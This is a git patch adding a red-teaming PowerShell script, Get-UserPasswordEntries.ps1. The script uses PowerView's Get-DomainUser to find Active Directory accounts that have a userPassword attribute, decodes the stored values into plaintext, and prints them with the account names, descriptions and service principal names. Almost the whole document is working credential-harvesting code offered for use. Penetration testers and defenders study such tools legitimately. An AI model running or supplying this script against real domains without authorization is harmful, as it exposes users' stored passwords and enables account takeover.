From f9c56de0d4903edfe7ca6a9b568afb47a47c670d Mon Sep 17 00:00:00 2001 From: mgeeky Date: Mon, 2 Mar 2020 15:35:18 +0100 Subject: [PATCH] Get-UserPasswordEntries.ps1 --- red-teaming/Get-UserPasswordEntries.ps1 | 60 +++++++++++++++++++++++++ 1 file changed, 60 insertions(+) create mode 100644 red-teaming/Get-UserPasswordEntries.ps1 diff --git a/red-teaming/Get-UserPasswordEntries.ps1 b/red-teaming/Get-UserPasswordEntries.ps1 new file mode 100644 index 0000000..e7febaf --- /dev/null +++ b/red-teaming/Get-UserPasswordEntries.ps1 @@ -0,0 +1,60 @@ +<# + This script enumerates user accounts in Active Directory and then collects + their .userPassword properties, decodes them and prints out. + + Assuming we have PowerView's Get-DomainUser command available. + + Usage: + PS> . .\Get-UserPasswordEntries.ps1 + PS> Get-UserPasswordEntries + + Mariusz B. / mgeeky +#> + +# This script requires PowerView 3.0 dev branch +# Import-Module powerview.ps1 -ErrorAction SilentlyContinue + +Function Get-UserPasswordEntries +{ + $num = 0 + + Get-DomainUser -Filter "(userpassword=*)" -Properties * | % { + $entry = $_ + $passw = $entry | Select -ExpandProperty userpassword + $passw2 = $passw | % {[char][int]$_} + $passw3 = $passw2 -join '' + $name1 = $entry.samaccountname + try { + $desc = $entry.description + } + catch { + $desc = "" + } + + try { + $name3 = $entry.serviceprincipalname + } + catch { + $name3 = "" + } + + $num += 1 + + $obj = @{ + SamAccountName = $name1 + ServicePrincipalName = $name3 + Description = $desc + UserPassword = $passw3 + } + $object = new-object psobject -Property $obj + + Write-Host $num".)" + Write-Host "SamAccountName:`t`t" $object.SamAccountName + Write-Host "Description:`t`t" $object.Description + Write-Host "ServicePrincipalName:`t" $object.ServicePrincipalName + Write-Host "UserPassword:`t`t" $object.UserPassword + Write-Host + } + + Write-Host "Found in total: "$num" entries." +} \ No newline at end of file